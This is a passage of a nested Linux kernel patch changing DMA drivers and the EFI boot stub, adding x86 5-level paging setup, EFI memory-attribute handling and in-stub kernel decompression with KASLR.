+-	ret = fsl_qdma_reg_init(fsl_qdma);
++	ret = fsl_qdma_irq_init(pdev, fsl_qdma);
++	if (ret)
++		return ret;
++
++	ret = dma_async_device_register(&fsl_qdma->dma_dev);
+ 	if (ret) {
+-		dev_err(&pdev->dev, "Can't Initialize the qDMA engine.\n");
++		dev_err(&pdev->dev, "Can't register NXP Layerscape qDMA engine.\n");
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/dma/ptdma/ptdma-dmaengine.c b/drivers/dma/ptdma/ptdma-dmaengine.c
+index 1aa65e5de0f3a..f792407348077 100644
+--- a/drivers/dma/ptdma/ptdma-dmaengine.c
++++ b/drivers/dma/ptdma/ptdma-dmaengine.c
+@@ -385,8 +385,6 @@ int pt_dmaengine_register(struct pt_device *pt)
+ 	chan->vc.desc_free = pt_do_cleanup;
+ 	vchan_init(&chan->vc, dma_dev);
+ 
+-	dma_set_mask_and_coherent(pt->dev, DMA_BIT_MASK(64));
+-
+ 	ret = dma_async_device_register(dma_dev);
+ 	if (ret)
+ 		goto err_reg;
+diff --git a/drivers/firmware/efi/capsule-loader.c b/drivers/firmware/efi/capsule-loader.c
+index 3e8d4b51a8140..97bafb5f70389 100644
+--- a/drivers/firmware/efi/capsule-loader.c
++++ b/drivers/firmware/efi/capsule-loader.c
+@@ -292,7 +292,7 @@ static int efi_capsule_open(struct inode *inode, struct file *file)
+ 		return -ENOMEM;
+ 	}
+ 
+-	cap_info->phys = kzalloc(sizeof(void *), GFP_KERNEL);
++	cap_info->phys = kzalloc(sizeof(phys_addr_t), GFP_KERNEL);
+ 	if (!cap_info->phys) {
+ 		kfree(cap_info->pages);
+ 		kfree(cap_info);
+diff --git a/drivers/firmware/efi/efi.c b/drivers/firmware/efi/efi.c
+index b7c0e8cc0764f..9077353d1c98d 100644
+--- a/drivers/firmware/efi/efi.c
++++ b/drivers/firmware/efi/efi.c
+@@ -185,8 +185,27 @@ static const struct attribute_group efi_subsys_attr_group = {
+ static struct efivars generic_efivars;
+ static struct efivar_operations generic_ops;
+ 
++static bool generic_ops_supported(void)
++{
++	unsigned long name_size;
++	efi_status_t status;
++	efi_char16_t name;
++	efi_guid_t guid;
++
++	name_size = sizeof(name);
++
++	status = efi.get_next_variable(&name_size, &name, &guid);
++	if (status == EFI_UNSUPPORTED)
++		return false;
++
++	return true;
++}
++
+ static int generic_ops_register(void)
+ {
++	if (!generic_ops_supported())
++		return 0;
++
+ 	generic_ops.get_variable = efi.get_variable;
+ 	generic_ops.get_next_variable = efi.get_next_variable;
+ 	generic_ops.query_variable_store = efi_query_variable_store;
+@@ -200,6 +219,9 @@ static int generic_ops_register(void)
+ 
+ static void generic_ops_unregister(void)
+ {
++	if (!generic_ops.get_variable)
++		return;
++
+ 	efivars_unregister(&generic_efivars);
+ }
+ 
+diff --git a/drivers/firmware/efi/libstub/Makefile b/drivers/firmware/efi/libstub/Makefile
+index b6e1dcb98a64c..473ef18421db0 100644
+--- a/drivers/firmware/efi/libstub/Makefile
++++ b/drivers/firmware/efi/libstub/Makefile
+@@ -84,6 +84,7 @@ lib-$(CONFIG_EFI_GENERIC_STUB)	+= efi-stub.o string.o intrinsics.o systable.o
+ lib-$(CONFIG_ARM)		+= arm32-stub.o
+ lib-$(CONFIG_ARM64)		+= arm64-stub.o smbios.o
+ lib-$(CONFIG_X86)		+= x86-stub.o
++lib-$(CONFIG_X86_64)		+= x86-5lvl.o
+ lib-$(CONFIG_RISCV)		+= riscv-stub.o
+ lib-$(CONFIG_LOONGARCH)		+= loongarch-stub.o
+ 
+diff --git a/drivers/firmware/efi/libstub/alignedmem.c b/drivers/firmware/efi/libstub/alignedmem.c
+index 1de9878ddd3a2..6b83c492c3b82 100644
+--- a/drivers/firmware/efi/libstub/alignedmem.c
++++ b/drivers/firmware/efi/libstub/alignedmem.c
+@@ -22,12 +22,15 @@
+  * Return:	status code
+  */
+ efi_status_t efi_allocate_pages_aligned(unsigned long size, unsigned long *addr,
+-					unsigned long max, unsigned long align)
++					unsigned long max, unsigned long align,
++					int memory_type)
+ {
+ 	efi_physical_addr_t alloc_addr;
+ 	efi_status_t status;
+ 	int slack;
+ 
++	max = min(max, EFI_ALLOC_LIMIT);
++
+ 	if (align < EFI_ALLOC_ALIGN)
+ 		align = EFI_ALLOC_ALIGN;
+ 
+@@ -36,7 +39,7 @@ efi_status_t efi_allocate_pages_aligned(unsigned long size, unsigned long *addr,
+ 	slack = align / EFI_PAGE_SIZE - 1;
+ 
+ 	status = efi_bs_call(allocate_pages, EFI_ALLOCATE_MAX_ADDRESS,
+-			     EFI_LOADER_DATA, size / EFI_PAGE_SIZE + slack,
++			     memory_type, size / EFI_PAGE_SIZE + slack,
+ 			     &alloc_addr);
+ 	if (status != EFI_SUCCESS)
+ 		return status;
+diff --git a/drivers/firmware/efi/libstub/arm64-stub.c b/drivers/firmware/efi/libstub/arm64-stub.c
+index e2f90566b291a..16f15e36f9a7d 100644
+--- a/drivers/firmware/efi/libstub/arm64-stub.c
++++ b/drivers/firmware/efi/libstub/arm64-stub.c
+@@ -180,7 +180,8 @@ efi_status_t handle_kernel_image(unsigned long *image_addr,
+ 		 * locate the kernel at a randomized offset in physical memory.
+ 		 */
+ 		status = efi_random_alloc(*reserve_size, min_kimg_align,
+-					  reserve_addr, phys_seed);
++					  reserve_addr, phys_seed,
++					  EFI_LOADER_CODE, 0, EFI_ALLOC_LIMIT);
+ 		if (status != EFI_SUCCESS)
+ 			efi_warn("efi_random_alloc() failed: 0x%lx\n", status);
+ 	} else {
+@@ -190,10 +191,11 @@ efi_status_t handle_kernel_image(unsigned long *image_addr,
+ 	if (status != EFI_SUCCESS) {
+ 		if (!check_image_region((u64)_text, kernel_memsize)) {
+ 			efi_err("FIRMWARE BUG: Image BSS overlaps adjacent EFI memory region\n");
+-		} else if (IS_ALIGNED((u64)_text, min_kimg_align)) {
++		} else if (IS_ALIGNED((u64)_text, min_kimg_align) &&
++			   (u64)_end < EFI_ALLOC_LIMIT) {
+ 			/*
+ 			 * Just execute from wherever we were loaded by the
+-			 * UEFI PE/COFF loader if the alignment is suitable.
++			 * UEFI PE/COFF loader if the placement is suitable.
+ 			 */
+ 			*image_addr = (u64)_text;
+ 			*reserve_size = 0;
+@@ -201,7 +203,8 @@ efi_status_t handle_kernel_image(unsigned long *image_addr,
+ 		}
+ 
+ 		status = efi_allocate_pages_aligned(*reserve_size, reserve_addr,
+-						    ULONG_MAX, min_kimg_align);
++						    ULONG_MAX, min_kimg_align,
++						    EFI_LOADER_CODE);
+ 
+ 		if (status != EFI_SUCCESS) {
+ 			efi_err("Failed to relocate kernel\n");
+diff --git a/drivers/firmware/efi/libstub/efi-stub-helper.c b/drivers/firmware/efi/libstub/efi-stub-helper.c
+index 3d9b2469a0dfd..97744822dd951 100644
+--- a/drivers/firmware/efi/libstub/efi-stub-helper.c
++++ b/drivers/firmware/efi/libstub/efi-stub-helper.c
+@@ -216,6 +216,8 @@ efi_status_t efi_parse_options(char const *cmdline)
+ 			efi_loglevel = CONSOLE_LOGLEVEL_QUIET;
+ 		} else if (!strcmp(param, "noinitrd")) {
+ 			efi_noinitrd = true;
++		} else if (IS_ENABLED(CONFIG_X86_64) && !strcmp(param, "no5lvl")) {
++			efi_no5lvl = true;
+ 		} else if (!strcmp(param, "efi") && val) {
+ 			efi_nochunk = parse_option_str(val, "nochunk");
+ 			efi_novamap |= parse_option_str(val, "novamap");
+diff --git a/drivers/firmware/efi/libstub/efistub.h b/drivers/firmware/efi/libstub/efistub.h
+index 970e86e3aab05..6741f3d900c5a 100644
+--- a/drivers/firmware/efi/libstub/efistub.h
++++ b/drivers/firmware/efi/libstub/efistub.h
+@@ -29,6 +29,11 @@
+ #define EFI_ALLOC_ALIGN		EFI_PAGE_SIZE
+ #endif
+ 
++#ifndef EFI_ALLOC_LIMIT
++#define EFI_ALLOC_LIMIT		ULONG_MAX
++#endif
++
++extern bool efi_no5lvl;
+ extern bool efi_nochunk;
+ extern bool efi_nokaslr;
+ extern int efi_loglevel;
+@@ -415,6 +420,26 @@ union efi_dxe_services_table {
+ 	} mixed_mode;
+ };
+ 
++typedef union efi_memory_attribute_protocol efi_memory_attribute_protocol_t;
++
++union efi_memory_attribute_protocol {
++	struct {
++		efi_status_t (__efiapi *get_memory_attributes)(
++			efi_memory_attribute_protocol_t *, efi_physical_addr_t, u64, u64 *);
++
++		efi_status_t (__efiapi *set_memory_attributes)(
++			efi_memory_attribute_protocol_t *, efi_physical_addr_t, u64, u64);
++
++		efi_status_t (__efiapi *clear_memory_attributes)(
++			efi_memory_attribute_protocol_t *, efi_physical_addr_t, u64, u64);
++	};
++	struct {
++		u32 get_memory_attributes;
++		u32 set_memory_attributes;
++		u32 clear_memory_attributes;
++	} mixed_mode;
++};
++
+ typedef union efi_uga_draw_protocol efi_uga_draw_protocol_t;
+ 
+ union efi_uga_draw_protocol {
+@@ -880,7 +905,9 @@ void efi_get_virtmap(efi_memory_desc_t *memory_map, unsigned long map_size,
+ efi_status_t efi_get_random_bytes(unsigned long size, u8 *out);
+ 
+ efi_status_t efi_random_alloc(unsigned long size, unsigned long align,
+-			      unsigned long *addr, unsigned long random_seed);
++			      unsigned long *addr, unsigned long random_seed,
++			      int memory_type, unsigned long alloc_min,
++			      unsigned long alloc_max);
+ 
+ efi_status_t efi_random_get_seed(void);
+ 
+@@ -907,7 +934,8 @@ efi_status_t efi_allocate_pages(unsigned long size, unsigned long *addr,
+ 				unsigned long max);
+ 
+ efi_status_t efi_allocate_pages_aligned(unsigned long size, unsigned long *addr,
+-					unsigned long max, unsigned long align);
++					unsigned long max, unsigned long align,
++					int memory_type);
+ 
+ efi_status_t efi_low_alloc_above(unsigned long size, unsigned long align,
+ 				 unsigned long *addr, unsigned long min);
+diff --git a/drivers/firmware/efi/libstub/mem.c b/drivers/firmware/efi/libstub/mem.c
+index 45841ef55a9f6..4f1fa302234d8 100644
+--- a/drivers/firmware/efi/libstub/mem.c
++++ b/drivers/firmware/efi/libstub/mem.c
+@@ -89,9 +89,12 @@ efi_status_t efi_allocate_pages(unsigned long size, unsigned long *addr,
+ 	efi_physical_addr_t alloc_addr;
+ 	efi_status_t status;
+ 
++	max = min(max, EFI_ALLOC_LIMIT);
++
+ 	if (EFI_ALLOC_ALIGN > EFI_PAGE_SIZE)
+ 		return efi_allocate_pages_aligned(size, addr, max,
+-						  EFI_ALLOC_ALIGN);
++						  EFI_ALLOC_ALIGN,
++						  EFI_LOADER_DATA);
+ 
+ 	alloc_addr = ALIGN_DOWN(max + 1, EFI_ALLOC_ALIGN) - 1;
+ 	status = efi_bs_call(allocate_pages, EFI_ALLOCATE_MAX_ADDRESS,
+diff --git a/drivers/firmware/efi/libstub/randomalloc.c b/drivers/firmware/efi/libstub/randomalloc.c
+index 9fb5869896be7..7ba05719a53ba 100644
+--- a/drivers/firmware/efi/libstub/randomalloc.c
++++ b/drivers/firmware/efi/libstub/randomalloc.c
+@@ -16,7 +16,8 @@
+  */
+ static unsigned long get_entry_num_slots(efi_memory_desc_t *md,
+ 					 unsigned long size,
+-					 unsigned long align_shift)
++					 unsigned long align_shift,
++					 u64 alloc_min, u64 alloc_max)
+ {
+ 	unsigned long align = 1UL << align_shift;
+ 	u64 first_slot, last_slot, region_end;
+@@ -29,11 +30,11 @@ static unsigned long get_entry_num_slots(efi_memory_desc_t *md,
+ 		return 0;
+ 
+ 	region_end = min(md->phys_addr + md->num_pages * EFI_PAGE_SIZE - 1,
+-			 (u64)ULONG_MAX);
++			 alloc_max);
+ 	if (region_end < size)
+ 		return 0;
+ 
+-	first_slot = round_up(md->phys_addr, align);
++	first_slot = round_up(max(md->phys_addr, alloc_min), align);
+ 	last_slot = round_down(region_end - size + 1, align);
+ 
+ 	if (first_slot > last_slot)
+@@ -53,7 +54,10 @@ static unsigned long get_entry_num_slots(efi_memory_desc_t *md,
+ efi_status_t efi_random_alloc(unsigned long size,
+ 			      unsigned long align,
+ 			      unsigned long *addr,
+-			      unsigned long random_seed)
++			      unsigned long random_seed,
++			      int memory_type,
++			      unsigned long alloc_min,
++			      unsigned long alloc_max)
+ {
+ 	unsigned long total_slots = 0, target_slot;
+ 	unsigned long total_mirrored_slots = 0;
+@@ -75,7 +79,8 @@ efi_status_t efi_random_alloc(unsigned long size,
+ 		efi_memory_desc_t *md = (void *)map->map + map_offset;
+ 		unsigned long slots;
+ 
+-		slots = get_entry_num_slots(md, size, ilog2(align));
++		slots = get_entry_num_slots(md, size, ilog2(align), alloc_min,
++					    alloc_max);
+ 		MD_NUM_SLOTS(md) = slots;
+ 		total_slots += slots;
+ 		if (md->attribute & EFI_MEMORY_MORE_RELIABLE)
+@@ -118,7 +123,7 @@ efi_status_t efi_random_alloc(unsigned long size,
+ 		pages = size / EFI_PAGE_SIZE;
+ 
+ 		status = efi_bs_call(allocate_pages, EFI_ALLOCATE_ADDRESS,
+-				     EFI_LOADER_DATA, pages, &target);
++				     memory_type, pages, &target);
+ 		if (status == EFI_SUCCESS)
+ 			*addr = target;
+ 		break;
+diff --git a/drivers/firmware/efi/libstub/x86-5lvl.c b/drivers/firmware/efi/libstub/x86-5lvl.c
+new file mode 100644
+index 0000000000000..479dd445acdcf
+--- /dev/null
++++ b/drivers/firmware/efi/libstub/x86-5lvl.c
+@@ -0,0 +1,95 @@
++// SPDX-License-Identifier: GPL-2.0-only
++#include <linux/efi.h>
++
++#include <asm/boot.h>
++#include <asm/desc.h>
++#include <asm/efi.h>
++
++#include "efistub.h"
++#include "x86-stub.h"
++
++bool efi_no5lvl;
++
++static void (*la57_toggle)(void *cr3);
++
++static const struct desc_struct gdt[] = {
++	[GDT_ENTRY_KERNEL32_CS] = GDT_ENTRY_INIT(0xc09b, 0, 0xfffff),
++	[GDT_ENTRY_KERNEL_CS]   = GDT_ENTRY_INIT(0xa09b, 0, 0xfffff),
++};
++
++/*
++ * Enabling (or disabling) 5 level paging is tricky, because it can only be
++ * done from 32-bit mode with paging disabled. This means not only that the
++ * code itself must be running from 32-bit addressable physical memory, but
++ * also that the root page table must be 32-bit addressable, as programming
++ * a 64-bit value into CR3 when running in 32-bit mode is not supported.
++ */
++efi_status_t efi_setup_5level_paging(void)
++{
++	u8 tmpl_size = (u8 *)&trampoline_ljmp_imm_offset - (u8 *)&trampoline_32bit_src;
++	efi_status_t status;
++	u8 *la57_code;
++
++	if (!efi_is_64bit())
++		return EFI_SUCCESS;
++
++	/* check for 5 level paging support */
++	if (native_cpuid_eax(0) < 7 ||
++	    !(native_cpuid_ecx(7) & (1 << (X86_FEATURE_LA57 & 31))))
++		return EFI_SUCCESS;
++
++	/* allocate some 32-bit addressable memory for code and a page table */
++	status = efi_allocate_pages(2 * PAGE_SIZE, (unsigned long *)&la57_code,
++				    U32_MAX);
++	if (status != EFI_SUCCESS)
++		return status;
++
++	la57_toggle = memcpy(la57_code, trampoline_32bit_src, tmpl_size);
++	memset(la57_code + tmpl_size, 0x90, PAGE_SIZE - tmpl_size);
++
++	/*
++	 * To avoid the need to allocate a 32-bit addressable stack, the
++	 * trampoline uses a LJMP instruction to switch back to long mode.
++	 * LJMP takes an absolute destination address, which needs to be
++	 * fixed up at runtime.
++	 */
++	*(u32 *)&la57_code[trampoline_ljmp_imm_offset] += (unsigned long)la57_code;
++
++	efi_adjust_memory_range_protection((unsigned long)la57_toggle, PAGE_SIZE);
++
++	return EFI_SUCCESS;
++}
++
++void efi_5level_switch(void)
++{
++	bool want_la57 = IS_ENABLED(CONFIG_X86_5LEVEL) && !efi_no5lvl;
++	bool have_la57 = native_read_cr4() & X86_CR4_LA57;
++	bool need_toggle = want_la57 ^ have_la57;
++	u64 *pgt = (void *)la57_toggle + PAGE_SIZE;
++	u64 *cr3 = (u64 *)__native_read_cr3();
++	u64 *new_cr3;
++
++	if (!la57_toggle || !need_toggle)
++		return;
++
++	if (!have_la57) {
++		/*
++		 * 5 level paging will be enabled, so a root level page needs
++		 * to be allocated from the 32-bit addressable physical region,
++		 * with its first entry referring to the existing hierarchy.
++		 */
++		new_cr3 = memset(pgt, 0, PAGE_SIZE);
++		new_cr3[0] = (u64)cr3 | _PAGE_TABLE_NOENC;
++	} else {
++		/* take the new root table pointer from the current entry #0 */
++		new_cr3 = (u64 *)(cr3[0] & PAGE_MASK);
++
++		/* copy the new root table if it is not 32-bit addressable */
++		if ((u64)new_cr3 > U32_MAX)
++			new_cr3 = memcpy(pgt, new_cr3, PAGE_SIZE);
++	}
++
++	native_load_gdt(&(struct desc_ptr){ sizeof(gdt) - 1, (u64)gdt });
++
++	la57_toggle(new_cr3);
++}
+diff --git a/drivers/firmware/efi/libstub/x86-stub.c b/drivers/firmware/efi/libstub/x86-stub.c
+index 4f0152b11a890..784e1b2ae5ccd 100644
+--- a/drivers/firmware/efi/libstub/x86-stub.c
++++ b/drivers/firmware/efi/libstub/x86-stub.c
+@@ -15,16 +15,16 @@
+ #include <asm/setup.h>
+ #include <asm/desc.h>
+ #include <asm/boot.h>
++#include <asm/kaslr.h>
++#include <asm/sev.h>
+ 
+ #include "efistub.h"
+-
+-/* Maximum physical address for 64-bit kernel with 4-level paging */
+-#define MAXMEM_X86_64_4LEVEL (1ull << 46)
++#include "x86-stub.h"
+ 
+ const efi_system_table_t *efi_system_table;
+ const efi_dxe_services_table_t *efi_dxe_table;
+-extern u32 image_offset;
+ static efi_loaded_image_t *image = NULL;
++static efi_memory_attribute_protocol_t *memattr;
+ 
+ static efi_status_t
+ preserve_pci_rom_image(efi_pci_io_protocol_t *pci, struct pci_setup_rom **__rom)
+@@ -212,8 +212,8 @@ static void retrieve_apple_device_properties(struct boot_params *boot_params)
+ 	}
+ }
+ 
+-static void
+-adjust_memory_range_protection(unsigned long start, unsigned long size)
++efi_status_t efi_adjust_memory_range_protection(unsigned long start,
++						unsigned long size)
+ {
+ 	efi_status_t status;
+ 	efi_gcd_memory_space_desc_t desc;
+@@ -221,12 +221,22 @@ adjust_memory_range_protection(unsigned long start, unsigned long size)
+ 	unsigned long rounded_start, rounded_end;
+ 	unsigned long unprotect_start, unprotect_size;
+ 
+-	if (efi_dxe_table == NULL)
+-		return;
+-
+ 	rounded_start = rounddown(start, EFI_PAGE_SIZE);
+ 	rounded_end = roundup(start + size, EFI_PAGE_SIZE);
+ 
++	if (memattr != NULL) {
++		status = efi_call_proto(memattr, clear_memory_attributes,
++					rounded_start,
++					rounded_end - rounded_start,
++					EFI_MEMORY_XP);
++		if (status != EFI_SUCCESS)
++			efi_warn("Failed to clear EFI_MEMORY_XP attribute\n");
++		return status;
++	}
++
++	if (efi_dxe_table == NULL)
++		return EFI_SUCCESS;
++
+ 	/*
+ 	 * Don't modify memory region attributes, they are
+ 	 * already suitable, to lower the possibility to
+@@ -238,7 +248,7 @@ adjust_memory_range_protection(unsigned long start, unsigned long size)
+ 		status = efi_dxe_call(get_memory_space_descriptor, start, &desc);
+ 
+ 		if (status != EFI_SUCCESS)
+-			return;
++			break;
+ 
+ 		next = desc.base_address + desc.length;
+ 
+@@ -263,69 +273,26 @@ adjust_memory_range_protection(unsigned long start, unsigned long size)
+ 				 unprotect_start,
+ 				 unprotect_start + unprotect_size,
+ 				 status);
++			break;
+ 		}
+ 	}
++	return EFI_SUCCESS;
+ }
+ 
+-/*
+- * Trampoline takes 2 pages and can be loaded in first megabyte of memory
+- * with its end placed between 128k and 640k where BIOS might start.
+- * (see arch/x86/boot/compressed/pgtable_64.c)
+- *
+- * We cannot find exact trampoline placement since memory map
+- * can be modified by UEFI, and it can alter the computed address.
+- */
+-
+-#define TRAMPOLINE_PLACEMENT_BASE ((128 - 8)*1024)
+-#define TRAMPOLINE_PLACEMENT_SIZE (640*1024 - (128 - 8)*1024)
+-
+-void startup_32(struct boot_params *boot_params);
+-
+-static void
+-setup_memory_protection(unsigned long image_base, unsigned long image_size)
++static efi_char16_t *efistub_fw_vendor(void)
+ {
+-	/*
+-	 * Allow execution of possible trampoline used
+-	 * for switching between 4- and 5-level page tables
+-	 * and relocated kernel image.
+-	 */
+-
+-	adjust_memory_range_protection(TRAMPOLINE_PLACEMENT_BASE,
+-				       TRAMPOLINE_PLACEMENT_SIZE);
++	unsigned long vendor = efi_table_attr(efi_system_table, fw_vendor);
+ 
+-#ifdef CONFIG_64BIT
+-	if (image_base != (unsigned long)startup_32)
+-		adjust_memory_range_protection(image_base, image_size);
+-#else
+-	/*
+-	 * Clear protection flags on a whole range of possible
+-	 * addresses used for KASLR. We don't need to do that
+-	 * on x86_64, since KASLR/extraction is performed after
+-	 * dedicated identity page tables are built and we only
+-	 * need to remove possible protection on relocated image
+-	 * itself disregarding further relocations.
+-	 */
+-	adjust_memory_range_protection(LOAD_PHYSICAL_ADDR,
+-				       KERNEL_IMAGE_SIZE - LOAD_PHYSICAL_ADDR);
+-#endif
++	return (efi_char16_t *)vendor;
+ }
+ 
+ static const efi_char16_t apple[] = L"Apple";
+ 
+-static void setup_quirks(struct boot_params *boot_params,
+-			 unsigned long image_base,
+-			 unsigned long image_size)
++static void setup_quirks(struct boot_params *boot_params)
+ {
+-	efi_char16_t *fw_vendor = (efi_char16_t *)(unsigned long)
+-		efi_table_attr(efi_system_table, fw_vendor);
+-
+-	if (!memcmp(fw_vendor, apple, sizeof(apple))) {
+-		if (IS_ENABLED(CONFIG_APPLE_PROPERTIES))
+-			retrieve_apple_device_properties(boot_params);
+-	}
+-
+-	if (IS_ENABLED(CONFIG_EFI_DXE_MEM_ATTRIBUTES))
+-		setup_memory_protection(image_base, image_size);
++	if (IS_ENABLED(CONFIG_APPLE_PROPERTIES) &&
++	    !memcmp(efistub_fw_vendor(), apple, sizeof(apple)))
++		retrieve_apple_device_properties(boot_params);
+ }
+ 
+ /*
+@@ -478,7 +445,6 @@ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 	}
+ 
+ 	image_base = efi_table_attr(image, image_base);
+-	image_offset = (void *)startup_32 - image_base;
+ 
+ 	status = efi_allocate_pages(sizeof(struct boot_params),
+ 				    (unsigned long *)&boot_params, ULONG_MAX);
+@@ -760,85 +726,139 @@ static efi_status_t exit_boot(struct boot_params *boot_params, void *handle)
+ 	return EFI_SUCCESS;
+ }
+ 
++static bool have_unsupported_snp_features(void)
++{
++	u64 unsupported;
++
++	unsupported = snp_get_unsupported_features(sev_get_status());
++	if (unsupported) {
++		efi_err("Unsupported SEV-SNP features detected: 0x%llx\n",
++			unsupported);
++		return true;
++	}
++	return false;
++}
++
++static void efi_get_seed(void *seed, int size)
++{
++	efi_get_random_bytes(size, seed);
++
++	/*
++	 * This only updates seed[0] when running on 32-bit, but in that case,
++	 * seed[1] is not used anyway, as there is no virtual KASLR on 32-bit.
++	 */
++	*(unsigned long *)seed ^= kaslr_get_random_long("EFI");
++}
++
++static void error(char *str)
++{
++	efi_warn("Decompression failed: %s\n", str);
++}
++
++static efi_status_t efi_decompress_kernel(unsigned long *kernel_entry)
++{
++	unsigned long virt_addr = LOAD_PHYSICAL_ADDR;
++	unsigned long addr, alloc_size, entry;
++	efi_status_t status;
++	u32 seed[2] = {};
++
++	/* determine the required size of the allocation */
++	alloc_size = ALIGN(max_t(unsigned long, output_len, kernel_total_size),
++			   MIN_KERNEL_ALIGN);
++
++	if (IS_ENABLED(CONFIG_RANDOMIZE_BASE) && !efi_nokaslr) {
++		u64 range = KERNEL_IMAGE_SIZE - LOAD_PHYSICAL_ADDR - kernel_total_size;
++		static const efi_char16_t ami[] = L"American Megatrends";
++
++		efi_get_seed(seed, sizeof(seed));
++
++		virt_addr += (range * seed[1]) >> 32;
++		virt_addr &= ~(CONFIG_PHYSICAL_ALIGN - 1);
++
++		/*
++		 * Older Dell systems with AMI UEFI firmware v2.0 may hang
++		 * while decompressing the kernel if physical address
++		 * randomization is enabled.
++		 *
++		 * https://bugzilla.kernel.org/show_bug.cgi?id=218173
++		 */
++		if (efi_system_table->hdr.revision <= EFI_2_00_SYSTEM_TABLE_REVISION &&
++		    !memcmp(efistub_fw_vendor(), ami, sizeof(ami))) {
++			efi_debug("AMI firmware v2.0 or older detected - disabling physical KASLR\n");
++			seed[0] = 0;
++		}
++
++		boot_params_ptr->hdr.loadflags |= KASLR_FLAG;
++	}
++
++	status = efi_random_alloc(alloc_size, CONFIG_PHYSICAL_ALIGN, &addr,
++				  seed[0], EFI_LOADER_CODE,
++				  LOAD_PHYSICAL_ADDR,
++				  EFI_X86_KERNEL_ALLOC_LIMIT);
++	if (status != EFI_SUCCESS)
++		return status;
++
++	entry = decompress_kernel((void *)addr, virt_addr, error);
++	if (entry == ULONG_MAX) {
++		efi_free(alloc_size, addr);
++		return EFI_LOAD_ERROR;
++	}
++
++	*kernel_entry = addr + entry;
++
++	return efi_adjust_memory_range_protection(addr, kernel_total_size);
++}
++
++static void __noreturn enter_kernel(unsigned long kernel_addr,
++				    struct boot_params *boot_params)
++{
++	/* enter decompressed kernel with boot_params pointer in RSI/ESI */
++	asm("jmp *%0"::"r"(kernel_addr), "S"(boot_params));
++
++	unreachable();
++}
++
+ /*
+- * On success, we return the address of startup_32, which has potentially been
+- * relocated by efi_relocate_kernel.
+- * On failure, we exit to the firmware via efi_exit instead of returning.
++ * On success, this routine will jump to the relocated image directly and never
++ * return.  On failure, it will exit to the firmware via efi_exit() instead of
++ * returning.
+  */
+-asmlinkage unsigned long efi_main(efi_handle_t handle,
+-				  efi_system_table_t *sys_table_arg,
+-				  struct boot_params *boot_params)
++void __noreturn efi_stub_entry(efi_handle_t handle,
++			       efi_system_table_t *sys_table_arg,
++			       struct boot_params *boot_params)
+ {
+-	unsigned long bzimage_addr = (unsigned long)startup_32;
+-	unsigned long buffer_start, buffer_end;
++	efi_guid_t guid = EFI_MEMORY_ATTRIBUTE_PROTOCOL_GUID;
+ 	struct setup_header *hdr = &boot_params->hdr;
+ 	const struct linux_efi_initrd *initrd = NULL;
++	unsigned long kernel_entry;
+ 	efi_status_t status;
+ 
++	boot_params_ptr = boot_params;
++
+ 	efi_system_table = sys_table_arg;
+ 	/* Check if we were booted by the EFI firmware */
+ 	if (efi_system_table->hdr.signature != EFI_SYSTEM_TABLE_SIGNATURE)
+ 		efi_exit(handle, EFI_INVALID_PARAMETER);
+ 
+-	efi_dxe_table = get_efi_config_table(EFI_DXE_SERVICES_TABLE_GUID);
+-	if (efi_dxe_table &&
+-	    efi_dxe_table->hdr.signature != EFI_DXE_SERVICES_TABLE_SIGNATURE) {
+-		efi_warn("Ignoring DXE services table: invalid signature\n");
+-		efi_dxe_table = NULL;
++	if (have_unsupported_snp_features())
++		efi_exit(handle, EFI_UNSUPPORTED);
++
++	if (IS_ENABLED(CONFIG_EFI_DXE_MEM_ATTRIBUTES)) {
++		efi_dxe_table = get_efi_config_table(EFI_DXE_SERVICES_TABLE_GUID);
++		if (efi_dxe_table &&
++		    efi_dxe_table->hdr.signature != EFI_DXE_SERVICES_TABLE_SIGNATURE) {
++			efi_warn("Ignoring DXE services table: invalid signature\n");
++			efi_dxe_table = NULL;
++		}
+ 	}
+ 
+-	/*
+-	 * If the kernel isn't already loaded at a suitable address,
+-	 * relocate it.
+-	 *
+-	 * It must be loaded above LOAD_PHYSICAL_ADDR.
+-	 *
+-	 * The maximum address for 64-bit is 1 << 46 for 4-level paging. This
+-	 * is defined as the macro MAXMEM, but unfortunately that is not a
+-	 * compile-time constant if 5-level paging is configured, so we instead
+-	 * define our own macro for use here.
+-	 *
+-	 * For 32-bit, the maximum address is complicated to figure out, for
+-	 * now use KERNEL_IMAGE_SIZE, which will be 512MiB, the same as what
+-	 * KASLR uses.
+-	 *
+-	 * Also relocate it if image_offset is zero, i.e. the kernel wasn't
+-	 * loaded by LoadImage, but rather by a bootloader that called the
+-	 * handover entry. The reason we must always relocate in this case is
+-	 * to handle the case of systemd-boot booting a unified kernel image,
+-	 * which is a PE executable that contains the bzImage and an initrd as
+-	 * COFF sections. The initrd section is placed after the bzImage
+-	 * without ensuring that there are at least init_size bytes available
+-	 * for the bzImage, and thus the compressed kernel's startup code may
+-	 * overwrite the initrd unless it is moved out of the way.
+-	 */
++	/* grab the memory attributes protocol if it exists */
++	efi_bs_call(locate_protocol, &guid, NULL, (void **)&memattr);
+ 
+-	buffer_start = ALIGN(bzimage_addr - image_offset,
+-			     hdr->kernel_alignment);
+-	buffer_end = buffer_start + hdr->init_size;
+-
+-	if ((buffer_start < LOAD_PHYSICAL_ADDR)				     ||
+-	    (IS_ENABLED(CONFIG_X86_32) && buffer_end > KERNEL_IMAGE_SIZE)    ||
+-	    (IS_ENABLED(CONFIG_X86_64) && buffer_end > MAXMEM_X86_64_4LEVEL) ||
+-	    (image_offset == 0)) {
+-		extern char _bss[];
+-
+-		status = efi_relocate_kernel(&bzimage_addr,
+-					     (unsigned long)_bss - bzimage_addr,
+-					     hdr->init_size,
+-					     hdr->pref_address,
+-					     hdr->kernel_alignment,
+-					     LOAD_PHYSICAL_ADDR);
+-		if (status != EFI_SUCCESS) {
+-			efi_err("efi_relocate_kernel() failed!\n");
+-			goto fail;
+-		}
+-		/*
+-		 * Now that we've copied the kernel elsewhere, we no longer
+-		 * have a set up block before startup_32(), so reset image_offset
+-		 * to zero in case it was set earlier.
+-		 */
+-		image_offset = 0;
++	status = efi_setup_5level_paging();
++	if (status != EFI_SUCCESS) {
++		efi_err("efi_setup_5level_paging() failed!\n");
++		goto fail;
+ 	}
+ 
+ #ifdef CONFIG_CMDLINE_BOOL
+@@ -858,6 +878,12 @@ asmlinkage unsigned long efi_main(efi_handle_t handle,
+ 		}
+ 	}
+ 
++	status = efi_decompress_kernel(&kernel_entry);
++	if (status != EFI_SUCCESS) {
++		efi_err("Failed to decompress kernel\n");
++		goto fail;
++	}
++
+ 	/*
+ 	 * At this point, an initrd may already have been loaded by the
